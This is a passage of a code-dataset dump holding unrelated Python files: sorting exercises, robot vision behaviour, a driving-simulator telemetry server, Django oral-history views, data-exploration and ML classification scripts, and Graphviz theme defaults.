len(arrA) and index_b < len(arrB):\r\n if arrA[index_a] < arrB[index_b]:\r\n merged_arr[index] = arrA[index_a]\r\n index_a += 1\r\n index += 1\r\n else:\r\n merged_arr[index] = arrB[index_b]\r\n index_b += 1\r\n index += 1\r\n\r\n # Checking if any element was left\r\n while index_b < len(arrB):\r\n merged_arr[index] = arrB[index_b]\r\n index_b += 1\r\n index += 1\r\n\r\n while index_a < len(arrA):\r\n merged_arr[index] = arrA[index_a]\r\n index_a += 1\r\n index += 1\r\n\r\n return merged_arr\r\n\r\n\r\n# TO-DO: implement the Merge Sort function below USING RECURSION\r\n\r\ndef merge_sort(arr):\r\n # TO-DO\r\n if len(arr) <= 1:\r\n return arr\r\n mid = len(arr) // 2\r\n return merge(merge_sort(arr[:mid]), merge_sort(arr[mid:]))\r\n\r\n\r\n# STRETCH: implement an in-place merge sort algorithm\r\n\r\n\r\ndef merge_in_place(arr, start, mid, end):\r\n # TO-DO\r\n start2 = mid + 1\r\n while start <= mid and start2 <= end:\r\n if arr[start] <= arr[start2]:\r\n start += 1\r\n else:\r\n index, value = start2, arr[start2]\r\n while (index != start):\r\n arr[index] = arr[index - 1]\r\n index -= 1\r\n arr[start] = value\r\n start += 1\r\n mid += 1\r\n start2 += 1\r\n\r\n\r\ndef merge_sort_in_place(arr, l, r):\r\n # TO-DO\r\n if l < r:\r\n m = l + (r - l) // 2\r\n merge_sort_in_place(arr, l, m)\r\n merge_sort_in_place(arr, m + 1, r)\r\n merge_in_place(arr, l, m, r)\r\n\r\n return arr\r\n\r\n\r\n# STRETCH: implement the Timsort function below\r\n# hint: check out https://github.com/python/cpython/blob/master/Objects/listsort.txt\r\ndef timsort(arr):\r\n\r\n return arr\r\n\r\n\r\nprint([0] * 2)\r\n","sub_path":"src/recursive_sorting/recursive_sorting.py","file_name":"recursive_sorting.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"58146806","text":"from Behaviours.behaviours import BehaviourFramework\nimport time\n\n\nclass RBDB(BehaviourFramework):\n def __init__(self):\n super(RBDB, self).__init__()\n self.detection = False\n self.sensors = []\n self.bbcon = None\n self.priority = 8\n\n @staticmethod\n def godkjent_farge(farge):\n return farge[0] in range(139, 256) and farge[1] in range(71) and farge[1] in range(71)\n\n def where(self):\n img = self.sensors[0].update()\n hvor = []\n pixels = img.load()\n widith, height = img.size\n mid = widith // 2\n\n for x in range(widith):\n for y in range(height):\n if not self.godkjent_farge(pixels[x, y]):\n pixels[x, y] = (0, 0, 0)\n else:\n self.detection = True\n if x in range(mid - 15, mid + 15):\n hvor.append('M')\n elif x < mid - 15:\n hvor.append('L')\n elif x < mid + 15:\n hvor.append('R')\n return hvor\n\n @staticmethod\n def mostFrequent(liste):\n count = 0\n ch = None\n for i in liste:\n if i != ch:\n c = liste.count(i)\n if c > count:\n count = c\n ch = i\n return ch\n\n def get_motor_recommendations(self):\n hvor = self.where()\n if hvor: self.match_degree = 1\n char = self.mostFrequent(hvor)\n\n if hvor:\n if char == 'M':\n print(\"Goal detected: goal forward\")\n return (0.32, 0.32, 1)\n\n if char == 'L':\n print(\"Goal Detected: goal to the left\")\n return (-0.27, 0.27, 1)\n\n if char == 'R':\n print(\"Goal Detected: goal to the right\")\n return (0.27, -0.27, 1)\n\n else:\n print(\"No goal detected: No signal, not moving\")\n return (0,0,0)\n\n def unpack_sensor_variables(self):\n pass\n\n\n def consider_activation(self):\n if time.time() - self.init_time > 5:\n self.active_flag = True\n\n def consider_deactivation(self):\n if self.active_flag:\n self.active_flag = False\n self.match_degree = 0\n\n","sub_path":"Behaviours/red_ball_behavior.py","file_name":"red_ball_behavior.py","file_ext":"py","file_size_in_byte":2317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"457428374","text":"#!/usr/bin/env python3\n\"\"\"\nplot individual neutral HDF5 files\n\"\"\"\n\nfrom pathlib import Path\nimport argparse\n\nimport h5py\nimport matplotlib.pyplot as plt\n\n\na = argparse.ArgumentParser()\na.add_argument(\"file\", help=\"neutral data file to plot\")\np = a.parse_args()\n\nfile = Path(p.file).expanduser().resolve(True)\n\nwith h5py.File(file, \"r\") as f:\n for k in {\"dn0all\", \"dnN2all\", \"dnO2all\", \"dvnrhoall\", \"dvnzall\", \"dTnall\"}:\n fg = plt.figure(constrained_layout=True)\n ax = fg.gca()\n\n ax.set_title(k)\n ax.pcolormesh(f[k][:].T)\n\nplt.show()\n","sub_path":"scripts/plot_neutral.py","file_name":"plot_neutral.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"165233009","text":"from flask import Flask\r\nimport eventlet\r\nimport socketio\r\nfrom keras.models import load_model\r\nimport base64\r\nfrom io import BytesIO\r\nfrom PIL import Image\r\nimport numpy as np\r\nfrom tensorflow import keras\r\nimport cv2\r\n\r\nsio = socketio.Server()\r\n\r\n\r\napp = Flask(__name__)\r\nspeed_limit = 10\r\n\r\ndef img_preprocess(img):\r\n img = img[60:135,:,:]\r\n img = cv2.cvtColor(img,cv2.COLOR_RGB2YUV)\r\n img = cv2.GaussianBlur(img, (3,3),0)\r\n img = cv2.resize(img,(200,66))\r\n img= img/255\r\n\r\n return img\r\n\r\n return img\r\n@sio.on('telemetry')\r\ndef telemetry(sid, data):\r\n if data:\r\n # The current steering angle of the car\r\n steering_angle = data[\"steering_angle\"]\r\n # The current throttle of the car\r\n throttle = data[\"throttle\"]\r\n # The current speed of the car\r\n speed = data[\"speed\"]\r\n # The current image from the center camera of the car\r\n imgString = data[\"image\"]\r\n image = Image.open(BytesIO(base64.b64decode(imgString)))\r\n image_array = np.asarray(image)\r\n image1 = cv2.resize(image_array, (66,200))\r\n steering_angle = float(model.predict(image1[None, :, :, :], batch_size=1))\r\n min_speed = 12\r\n max_speed = 24\r\n if float(speed) < min_speed:\r\n throttle = 1.0/10\r\n elif float(speed) > max_speed:\r\n throttle = -1.0\r\n else:\r\n throttle = 0.2\r\n\r\n print(steering_angle, throttle)\r\n send_control(steering_angle, throttle)\r\n\r\n # save frame\r\n #if args.image_folder != '':\r\n # timestamp = datetime.utcnow().strftime('%Y_%m_%d_%H_%M_%S_%f')[:-3]\r\n # image_filename = os.path.join(args.image_folder, timestamp)\r\n # image.save('{}.jpg'.format(image_filename))\r\n else:\r\n # NOTE: DON'T EDIT THIS.\r\n sio.emit('manual', data={}, skip_sid=True)\r\n\r\n@sio.on('connect')\r\ndef connect(sid,environ):\r\n print('connect')\r\n send_control(0,0)\r\n\r\ndef send_control(steering_angle,throttle):\r\n sio.emit('steer',data ={\r\n 'steering_angle':steering_angle.__str__(),\r\n 'throttle':throttle.__str__()\r\n })\r\n#send_control(0,1)\r\n\r\n\r\nif __name__=='__main__':\r\n model = load_model('model.h5')\r\n print(\"Original model:\", model)\r\n app = socketio.Middleware(sio,app)\r\n eventlet.wsgi.server(eventlet.listen(('',4567)),app)\r\n","sub_path":"drive.py","file_name":"drive.py","file_ext":"py","file_size_in_byte":2354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"540905597","text":"# -*- coding: utf-8 -*-\n\nfrom openerp import models, fields, api\n\nclass Model(models.Model):\n \"\"\"pbx provision\"\"\"\n \n _name = 'pbx.provision.device.model'\n _description = \"Device Model\"\n\n name = fields.Char(string='Name', size=64, required=True)\n manufacturer_id = fields.Many2one(comodel_name='pbx.provision.device.manufacturer', string='Manufacturer')\n lines = fields.Integer(string='Lines')\n template = fields.Text(string='Template')\n","sub_path":"pbx/models/provision/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"29613377","text":"from sklearn.feature_extraction.text import HashingVectorizer\nimport pymongo, numpy as np, sys, os\n\nsys.path.append(os.path.dirname(os.path.dirname(os.getcwd())))\nfrom pesquisas.search_engine.mongo_url import mongo_url\nfrom pesquisas.common.recursive_folders import recursive_folders\nfrom pesquisas.common_nlp.textNormalization import textNormalization\n\n\nclass main_class:\n def __init__(self):\n self.myclient = pymongo.MongoClient(mongo_url)\n self.DATABASE = \"jurisprudencia_se\"\n # self.DATABASE = 'banco_precos'\n self.COLLECTION = \"covid\"\n # self.COLLECTION = '2019'\n self.COLLECTION_CLUSTERS = self.COLLECTION + \"_cluster_\"\n self.COLLECTION_INDEX = self.DATABASE + \"_\" + self.COLLECTION + \"_index\"\n self.COLUMN_SOURCE = \"text\"\n # self.COLUMN_SOURCE = 'historico_despesa'\n self.ALTERNATE_COLUMN_SOURCE = \"\"\n self.VAR_NAME = \"vetor\"\n self.NUMBER_OF_CLUSTERS = 10\n # self.NUMBER_OF_CLUSTERS = 1000\n self.N_FEATURES = 25000\n self.mydb = self.myclient[self.DATABASE]\n self.myclient = pymongo.MongoClient(mongo_url)\n self.vectorizer = HashingVectorizer(\n n_features=self.N_FEATURES, dtype=np.float32\n )\n self.PATH = \"/mnt/Dados/Documents/covid19/covid_2020_new.csv\"\n # self.PATH = '/mnt/Dados/Documents/pesquisas_privado_dados/compras_publicas/Portais_transparência/2019'\n self.txtN = textNormalization()\n self.rec = recursive_folders()\n","sub_path":"search_engine/main_class.py","file_name":"main_class.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"134596772","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport datetime\n\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.core.mail import send_mail\nfrom django.http import HttpResponseRedirect, Http404, HttpResponse\nfrom django.shortcuts import render\nfrom django.urls import reverse, reverse_lazy\nfrom django.views.generic import TemplateView, ListView, FormView, UpdateView\nfrom django.views.generic.detail import DetailView\n\n\nfrom .models import Interview, OralHistory, Tag\nfrom .forms import InterviewForm, OHPForm, TagForm\nfrom project_share.models import Project, FileUpload, Application\n\nfrom django_teams.models import Team\n\n\nUser = get_user_model()\n\n# Create your views here.\n\n\nclass OralHistoryIndexView(ListView):\n template_name = 'oral_history/menu.html'\n model = OralHistory\n\n def get_queryset(self):\n queryset = OralHistory.objects.filter(is_official=True, approved=True)\n return queryset\n\n def get_classrooms(self):\n return OralHistory.objects.filter(is_official=False, approved=True)\n\n\nclass InterviewIndexView(ListView):\n template_name = 'oral_history/oral_history.html'\n model = Interview\n\n def slug_return(self):\n return self.kwargs['slug']\n\n def project(self):\n return OralHistory.objects.filter(slug=self.kwargs['slug'])\n\n def get_queryset(self):\n queryset = Interview.objects.filter(project__slug=self.kwargs['slug'], approved=True)\n return queryset\n\n\nclass InterviewView(TemplateView, FormView):\n template_name = 'oral_history/interview.html'\n form_class = TagForm\n\n def slug_return(self):\n return self.kwargs['slug']\n\n def slug_interview_return(self):\n return self.kwargs['slug_interview']\n\n def get_context_data(self, **kwargs):\n context = super(InterviewView, self).get_context_data(**kwargs)\n slug_interview = self.kwargs['slug_interview']\n context['interview_context'] = Interview.objects.filter(slug=slug_interview)\n pk = context['interview_context'][0].pk\n context['tags'] = Tag.objects.filter(interview__pk=pk, approved=True).order_by('timestamp')\n return context\n\n def get_initial(self):\n initial = super(InterviewView, self).get_initial()\n slug_interview = self.kwargs['slug_interview']\n initial['interview'] = Interview.objects.get(slug=slug_interview)\n return initial\n\n def form_valid(self, form):\n return HttpResponseRedirect(reverse('oral_history:thank_you_tag',\n kwargs={'slug': self.kwargs['slug'],\n 'slug_interview': self.kwargs['slug_interview']}))\n\n def form_invalid(self, form):\n return HttpResponseRedirect(reverse('oral_history:error'))\n\n def post(self, request, *args, **kwargs):\n form = TagForm(request.POST or None)\n if form.is_valid():\n new_tag = form.save(commit=False)\n new_tag.interview = Interview.objects.get(slug=self.kwargs['slug_interview'])\n new_tag.tag = form.cleaned_data['tag']\n hours = form.cleaned_data['hours']\n mins = form.cleaned_data['mins']\n secs = form.cleaned_data['secs']\n total_time = (hours * 3600) + (mins * 60) + secs\n new_tag.timestamp = datetime.timedelta(seconds=total_time)\n if not new_tag.interview.user == self.request.user:\n send_mail('CSDT: New Oral History Project Tag needs approval',\n 'There is a new oral history project tag that \\\n needs approval on the CSDT server admin. \\\n Please approve it.',\n 'csdtrpi@gmail.com',\n ['holmr@rpi.edu'],\n fail_silently=True)\n new_tag.approved = False\n else:\n new_tag.approved = True\n new_tag.save()\n form.save()\n\n return self.form_valid(form)\n else:\n return self.form_invalid(form)\n\n\nclass UploadInterview(LoginRequiredMixin, DetailView, FormView):\n template_name = 'oral_history/upload.html'\n form_class = InterviewForm\n success_url = reverse_lazy('oral_history:thank_you')\n\n def get_object(self, queryset=None):\n pass\n\n def form_valid(self, form):\n return HttpResponseRedirect(reverse('oral_history:thank_you'))\n\n def form_invalid(self, form):\n return HttpResponseRedirect(reverse('oral_history:error'))\n\n def get_initial(self):\n initial = super(UploadInterview, self).get_initial()\n try:\n original_project = OralHistory.objects.get(slug=self.kwargs['slug'])\n except:\n # exception can occur if the edited user has no groups\n # or has more than one group\n pass\n else:\n initial['project'] = original_project\n initial['user'] = self.request.user\n # classrooms = Team.objects.filter(users=self.request.user)\n # initial['classrooms'] = classrooms\n return initial\n\n def get_slug(self):\n return self.kwargs['slug']\n\n def get_form_kwargs(self):\n kwargs = super(UploadInterview, self).get_form_kwargs()\n kwargs.update({'user': self.request.user})\n return kwargs\n\n def post(self, request, *args, **kwargs):\n # self.object = self.get_object()\n form = InterviewForm(request.POST or None, request.FILES or None, user=request.user)\n if form.is_valid():\n new_interview = form.save(commit=False)\n if request.FILES:\n form.mp3_file = request.FILES['mp3_file']\n form.pic = request.FILES['pic']\n\n # text_dump = json.dumps([self.kwargs['slug'], slugify(form.cleaned_data['full_name'])])\n # project_blob = FileUpload(file_path=text_dump)\n # project_blob.save()\n image_blob = FileUpload(file_path=form.pic)\n image_blob.save()\n # find curr classroom\n # classroom =\n application = Application.objects.get(name=\"Oral Histories\")\n if form.cleaned_data['classroom']:\n classroom = Team.objects.get(pk=form.cleaned_data['classroom'])\n else:\n classroom = None\n new_proj = Project(name=form.cleaned_data['full_name'],\n description=form.cleaned_data['summary'],\n owner=request.user,\n application=application,\n classroom=classroom,\n screenshot=image_blob, )\n new_proj.save()\n new_interview.csdt_project = new_proj\n new_interview.save()\n form.save()\n send_mail('CSDT: New Oral History Project Interview needs approval',\n 'There is a new oral history project interview\\\n that needs approval on the CSDT server admin. \\\n Please approve it.', 'csdtrpi@gmail.com',\n ['holmr@rpi.edu'], fail_silently=True)\n return self.form_valid(form)\n # return HttpResponseRedirect(reverse('oral_history:upload'))\n return HttpResponse(render(request, 'oral_history/upload.html', {'form': form, }))\n\n\nclass UploadOHP(LoginRequiredMixin, DetailView, FormView):\n template_name = 'oral_history/upload_ohp.html'\n form_class = OHPForm\n success_url = reverse_lazy('oral_history:thank_you')\n\n def get_object(self, queryset=None):\n pass\n\n def form_valid(self, form):\n return HttpResponseRedirect(reverse('oral_history:thank_you_ohp'))\n\n def form_invalid(self, form):\n return HttpResponseRedirect(reverse('oral_history:error'))\n\n def get_initial(self):\n initial = super(UploadOHP, self).get_initial()\n initial['user'] = self.request.user\n return initial\n\n def get_form_kwargs(self):\n kwargs = super(UploadOHP, self).get_form_kwargs()\n kwargs.update({'user': self.request.user})\n return kwargs\n\n def post(self, request, *args, **kwargs):\n # self.object = self.get_object()\n form = OHPForm(request.POST or None, request.FILES or None, user=request.user)\n if form.is_valid():\n new_ohp = form.save(commit=False)\n if request.FILES:\n form.pic = request.FILES['pic']\n new_ohp.save()\n form.save()\n send_mail('CSDT: New Oral History Project needs approval',\n 'There is a new oral history project that needs approval \\\n on the CSDT server admin. Please approve it.',\n 'csdtrpi@gmail.com', ['holmr@rpi.edu'],\n fail_silently=True)\n return self.form_valid(form)\n else:\n return self.form_invalid(form)\n\n\nclass ThankYou(TemplateView):\n template_name = 'oral_history/thankyou.html'\n\n\nclass ThankYouOHP(TemplateView):\n template_name = 'oral_history/thankyou_ohp.html'\n\n\nclass ThankYouTag(TemplateView):\n template_name = 'oral_history/thankyou_tag.html'\n\n def get_slug(self):\n return self.kwargs['slug']\n\n def get_slug_interview(self):\n return self.kwargs['slug_interview']\n\n\nclass Error(TemplateView):\n template_name = 'oral_history/error.html'\n\n\nclass InterviewUpdate(LoginRequiredMixin, UpdateView):\n template_name = 'oral_history/upload_update.html'\n form_class = InterviewForm\n model = Interview\n\n def get_object(self, queryset=None):\n\n obj = Interview.objects.get(slug=self.kwargs['slug_interview'])\n if not obj.user == self.request.user:\n raise Http404\n return obj\n\n def get_slug(self):\n return self.kwargs['slug']\n\n def get_slug_interview(self):\n return self.kwargs['slug_interview']\n\n def form_valid(self, form):\n return HttpResponseRedirect(reverse('oral_history:thank_you'))\n\n def form_invalid(self, form):\n return HttpResponseRedirect(reverse('oral_history:error'))\n\n def get_initial(self):\n return {\n 'mp3_file': self.object.mp3_file,\n 'pic': self.object.pic,\n 'full_name': self.object.full_name,\n 'date': self.object.date,\n 'location': self.object.location,\n 'interview_by': self.object.interview_by,\n 'birthplace': self.object.birthplace,\n 'occupation': self.object.occupation,\n 'birth_year': self.object.birth_year,\n 'summary': self.object.summary,\n 'project': self.object.project,\n 'classroom': self.object.csdt_project.classroom,\n }\n\n success_url = reverse_lazy('home')\n\n def post(self, request, *args, **kwargs):\n self.object = self.get_object() # assign the object to the view\n form = InterviewForm(request.POST or None, request.FILES or None, instance=self.object)\n if form.is_valid():\n form.save()\n return self.form_valid(form)\n return render(\n request,\n 'oral_history/upload_update.html',\n {'form': form, })\n\n\nclass OHPUpdate(LoginRequiredMixin, UpdateView):\n template_name = 'oral_history/update_ohp.html'\n form_class = OHPForm\n model = OralHistory\n\n def get_object(self, queryset=None):\n\n obj = OralHistory.objects.get(slug=self.kwargs['slug'])\n if not obj.user == self.request.user:\n raise Http404\n return obj\n\n def form_valid(self, form):\n return HttpResponseRedirect(reverse('oral_history:thank_you'))\n\n def form_invalid(self, form):\n return HttpResponseRedirect(reverse('oral_history:error'))\n\n def get_initial(self):\n return {\n 'project_name': self.object.project_name,\n 'pic': self.object.pic,\n 'byline': self.object.byline,\n 'summary': self.object.summary,\n 'user': self.object.user,\n }\n\n success_url = reverse_lazy('home')\n\n def post(self, request, *args, **kwargs):\n self.object = self.get_object() # assign the object to the view\n form = OHPForm(request.POST or None, request.FILES or None, instance=self.object)\n if form.is_valid():\n form.save()\n return self.form_valid(form)\n return render(\n request,\n 'oral_history/update_ohp.html',\n {'form': form, })\n","sub_path":"oral_history/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"291117518","text":"\"\"\"\nThis module contains functions that explore distributions of values and\nrelationships between columns.\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndef extrema(narray):\n \"\"\"\n Returns a (min, max) tuple for the narry.\n \"\"\"\n return (np.min(narray), np.max(narray))\n\n\ndef unique_columns(df):\n \"\"\"\n Returns a list of columns that have a unique value for every row.\n \"\"\"\n colnames = []\n for colname in df.columns:\n if df[colname].nunique() == len(df):\n colnames.append(colname)\n\n return colnames\n\n\ndef binary_columns(df):\n \"\"\"\n Returns a list of columns in the dataframe that only have two unique\n values.\n \"\"\"\n return [name for name in df.columns if len(pd.unique(df[name])) == 2]\n\n\ndef missing_columns(df):\n \"\"\"\n Returns a list of columns in the dataframe that include NaN or null values.\n \"\"\"\n total = len(df)\n counts = df.count()\n return [name for name in df.columns if counts[name] < total]\n\n\ndef plot_missing(df, *colnames):\n \"\"\"\n Plots a bar chart comparing the number of present and missing values for\n the given columns.\n \"\"\"\n fig = plt.figure(1, figsize=(9, 6))\n\n fig_columns = len(colnames) // 3 + 1;\n for i, colname in enumerate(colnames, start=1):\n plt.subplot(fig_columns, 3, i)\n missing = df[colname][df[colname].isnull()]\n present = df[colname][df[colname].notnull()]\n plt.title(colname)\n plt.bar(['present', 'missing'], [len(present), len(missing)])\n\n plt.tight_layout()\n plt.show()\n\n\ndef plot_label(df, colname):\n \"\"\"\n Plots a bar chart showing the distribution of values between true and\n false for a single column.\n \"\"\"\n plot_binary_predicate(df, colname, 'true', 'false', lambda col: col == True)\n\n\ndef plot_binary_predicate(df, col, true_name, false_name, predicate):\n \"\"\"\n Plots a bar chart showing the distribution of values between two classes,\n one where the predicate is true and one where the predicate is false.\n \"\"\"\n true_count = len(df[col][predicate(df[col])])\n false_count = len(df[col][~predicate(df[col])])\n plt.bar([true_name, false_name], [true_count, false_count])\n plt.show()\n","sub_path":"hw3/pipeline/explore.py","file_name":"explore.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"291629299","text":"# Loading Libraries\n\nimport pandas as pd\nfrom collections import Counter\nimport numpy as np\nfrom numpy import mean\nfrom numpy import std\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import RepeatedStratifiedKFold\nfrom matplotlib import pyplot as plt\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom imblearn.over_sampling import SMOTE\nfrom sklearn.model_selection import train_test_split\n\n\n# =============================================================================\n\n# load the csv file as a data frame\ndataframe = pd.read_csv('Pohang.csv')\nX = dataframe.iloc[:, :-1].values\ny = dataframe.iloc[:, 8].values\n\n#Rescale data (between 0 and 1)\nfrom sklearn.preprocessing import MinMaxScaler\nscaler = MinMaxScaler(feature_range=(0, 1))\nrescaledX = scaler.fit_transform(X)\n\n# Taking care of missing data\nfrom sklearn.impute import SimpleImputer\n# creating object for SimpleImputer class as \"imputer\"\nimputer = SimpleImputer(missing_values = np.nan, strategy = 'mean', verbose=0)\nimputer = imputer.fit(rescaledX[:, 1:8]) #upper bound is not included, but lower bound\nrescaledX[:, 1:8] = imputer.transform(rescaledX[:, 1:8])\n\n\n# =============================================================================\n\n# summarize the class distribution\ntarget = dataframe.values[:,-1]\ncounter = Counter(target)\nfor k,v in counter.items():\n\tper = v / len(target) * 100\n\tprint('Class=%s, Count=%s, Percentage=%.3f%%' % (k, v, per))\n \n# summarize class distribution\nprint(X.shape, y.shape,Counter(y))\n\n\n# Implementing SMOTE for the Imbalanced data in Multi-class classification\nsmote=SMOTE(\"minority\")\nX,y=smote.fit_sample(rescaledX,y)\n\n# Re-summarize class distribution\nprint(X.shape, y.shape,Counter(y))\n\n# To balance another minority class\nsmote=SMOTE(\"minority\")\nX,y=smote.fit_sample(X,y)\n\n# Re-summarize class distribution\nprint(X.shape, y.shape,Counter(y))\n\n# To balance another minority class\nsmote=SMOTE(\"minority\")\nX,y=smote.fit_sample(X,y)\n\n# Re-summarize class distribution\nprint(X.shape, y.shape,Counter(y))\n\n# =============================================================================\n\n# Separate data into test and training sets\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.20)\n\n# =============================================================================\n\n# get a list of models to evaluate\ndef get_models():\n\tmodels = dict()\n\tfor i in range(1, 9):\n\t\tmodels[str(i)] = ExtraTreesClassifier(max_features=i)\n\treturn models\n\n# evaluate a given model using cross-validation\ndef evaluate_model(model):\n\tcv = RepeatedStratifiedKFold(n_splits=10, n_repeats=3, random_state=1)\n\tscores = cross_val_score(model, X_train, y_train, scoring='accuracy', cv=cv, n_jobs=-1, error_score='raise')\n\treturn scores\n\n# get the models to evaluate\nmodels = get_models()\n\n# evaluate the models and store results\nresults, names = list(), list()\nfor name, model in models.items():\n\tscores = evaluate_model(model)\n\tresults.append(scores)\n\tnames.append(name)\n\tprint('>%s %.3f (%.3f)' % (name, mean(scores), std(scores)))\n \n# plot model performance for comparison\nimport matplotlib.pyplot as pyplot\npyplot.boxplot(results, labels=names, showmeans=True)\nplt.xlabel('Features of the input data')\nplt.ylabel('Accuracy score')\npyplot.show()\n\n\n\n\n\n","sub_path":"Machine Learning A-Z Template Folder/Part 3 - Classification/Section 19 - Decision Tree Classification/ExtraTreesEnsemble_Feature_Tunning.py","file_name":"ExtraTreesEnsemble_Feature_Tunning.py","file_ext":"py","file_size_in_byte":3290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"427669602","text":"default_graph_attrs = {\n \"bgcolor\": \"white\",\n \"center\": \"false\",\n \"charset\": \"utf-8\",\n \"clusterrank\": \"local\",\n \"colorscheme\": \"\",\n \"comment\": \"\",\n \"compound\": \"true\",\n \"concentrate\": \"false\",\n \"fontcolor\": \"black\",\n \"fontname\": \"times-roman\",\n \"fontpath\": \"system-dependent\",\n \"fontsize\": \"14\",\n \"forcelabels\": \"true\",\n \"gradientangle\": \"\",\n \"imagepath\": \"\",\n \"label\": \"\",\n \"labeljust\": \"c\",\n \"labelloc\": \"b\",\n \"landscape\": \"false\",\n \"layout\": \"dot\",\n \"margin\": \"0\",\n \"mclimit\": \"1\",\n \"newrank\": \"false\",\n \"nodesep\": \"0.25\",\n \"nojustify\": \"false\",\n # \"nslimit\": \"\",\n # \"nslimit1\": \"\",\n \"ordering\": \"\",\n \"orientation\": \"0\",\n \"outputorder\": \"breadthfirst\",\n \"pack\": \"false\",\n # \"packmode\": \"node\",\n \"pad\": \"0.0555\",\n \"pagedir\": \"bl\",\n \"quantum\": \"0.0\",\n \"rankdir\": \"TB\",\n \"ranksep\": \"0.5\",\n \"ratio\": \"auto\",\n \"remincross\": \"true\",\n \"rotate\": \"0\",\n \"searchsize\": \"30\",\n \"showboxes\": \"0\",\n \"size\": \"\",\n \"sortv\": \"0\",\n \"splines\": \"line\",\n \"style\": \"\",\n \"viewport\": \"\",\n}\n\ndefault_cluster_attrs = {\n \"bgcolor\": \"transparent\",\n \"color\": \"black\",\n \"colorscheme\": \"\",\n \"fillcolor\": \"black\",\n \"fontcolor\": \"black\",\n \"fontname\": \"times-roman\",\n \"fontsize\": \"14\",\n \"gradientangle\": \"\",\n \"label\": \"\",\n \"labeljust\": \"c\",\n \"labelloc\": \"t\",\n \"layer\": \"\",\n \"margin\": \"8\",\n \"nojustify\": \"false\",\n \"pencolor\": \"black\",\n \"penwidth\": \"1\",\n \"peripheries\": \"1\",\n \"sortv\": \"0\",\n \"style\": \"\",\n}\n\ndefault_node_attrs = {\n \"color\": \"black\",\n \"colorscheme\": \"\",\n \"comment\": \"\",\n \"distortion\": \"0\",\n \"fillcolor\": \"lightgrey\",\n \"fixedsize\": \"false\",\n \"fontcolor\": \"black\",\n \"fontname\": \"times-roman\",\n \"fontsize\": \"14\",\n \"gradientangle\": \"\",\n \"group\": \"\",\n \"height\": \"0.5\",\n # \"image\": \"\",\n \"imagepos\": \"tc\",\n \"imagescale\": \"false\",\n # \"label\": \"\",\n \"labelloc\": \"c\",\n \"layer\": \"\",\n \"margin\": \"0.11,0.055\",\n \"nojustify\": \"false\",\n \"ordering\": \"\",\n \"orientation\": \"0\",\n \"penwidth\": \"1\",\n \"peripheries\": \"1\",\n \"pos\": \"\",\n \"regular\": \"false\",\n \"shape\": \"ellipse\",\n \"shapefile\": \"\",\n \"showboxes\": \"0\",\n \"sides\": \"4\",\n \"skew\": \"0\",\n \"sortv\": \"0\",\n \"style\": \"\",\n \"width\": \"0.75\",\n # \"xlabel\": \"\",\n}\n\ndefault_edge_attrs = {\n \"arrowhead\": \"normal\",\n \"arrowsize\": \"1\",\n \"arrowtail\": \"normal\",\n \"color\": \"black\",\n \"colorscheme\": \"\",\n \"comment\": \"\",\n \"constraint\": \"true\",\n \"decorate\": \"false\",\n \"dir\": \"forward\",\n \"fillcolor\": \"black\",\n \"fontcolor\": \"black\",\n \"fontname\": \"times-roman\",\n \"fontsize\": \"14\",\n \"headclip\": \"true\",\n \"headlabel\": \"\",\n \"headport\": \"center\",\n \"label\": \"\",\n \"labelangle\": \"-25\",\n \"labeldistance\": \"1\",\n \"labelfloat\": \"false\",\n \"labelfontcolor\": \"black\",\n \"labelfontname\": \"times-roman\",\n \"labelfontsize\": \"14\",\n \"layer\": \"\",\n \"lhead\": \"\",\n \"ltail\": \"\",\n \"minlen\": \"1\",\n \"nojustify\": \"false\",\n \"penwidth\": \"1\",\n \"pos\": \"\",\n \"samehead\": \"\",\n \"sametail\": \"\",\n \"showboxes\": \"0\",\n \"style\": \"\",\n \"tailclip\": \"true\",\n \"taillabel\": \"\",\n \"tailport\": \"center\",\n \"weight\": \"1\",\n \"xlabel\": \"\",\n}\n\nclass Default():\n\n def __init__(self, graph_attr_overrides={}, cluster_attr_overrides={}, node_attr_overrides={}, edge_attr_overrides={}, color_overrides=[]):\n \n self.graph_attrs = default_graph_attrs\n self.cluster_attrs = default_cluster_attrs\n self.edge_attrs = default_edge_attrs\n self.node_attrs = default_node_attrs\n self.colors = []\n\n if graph_attr_overrides is not None:\n self.graph_attrs.update(graph_attr_overrides)\n\n if cluster_attr_overrides is not None:\n self.cluster_attrs.update(cluster_attr_overrides)\n\n if node_attr_overrides is not None:\n self.node_attrs.update(node_attr_overrides)\n\n if edge_attr_overrides is not None:\n self.edge_attrs.update(edge_attr_overrides)\n\n if color_overrides:\n self.colors = color_overrides\n\n\nclass LightMode():\n\n def __init__(self, graph_attr_overrides={}, cluster_attr_overrides={}, node_attr_overrides={}, edge_attr_overrides={}, color_overrides=[]):\n\n self.graph_attrs = default_graph_attrs\n self.cluster_attrs = default_cluster_attrs\n self.edge_attrs = default_edge_attrs\n self.node_attrs = default_node_attrs\n self.colors = [\"#FBFBFB\", \"#EDEDED\", \"#E0E0E0\", \"#D3D3D3\"]\n\n theme_graph_attrs = {\n \"bgcolor\": 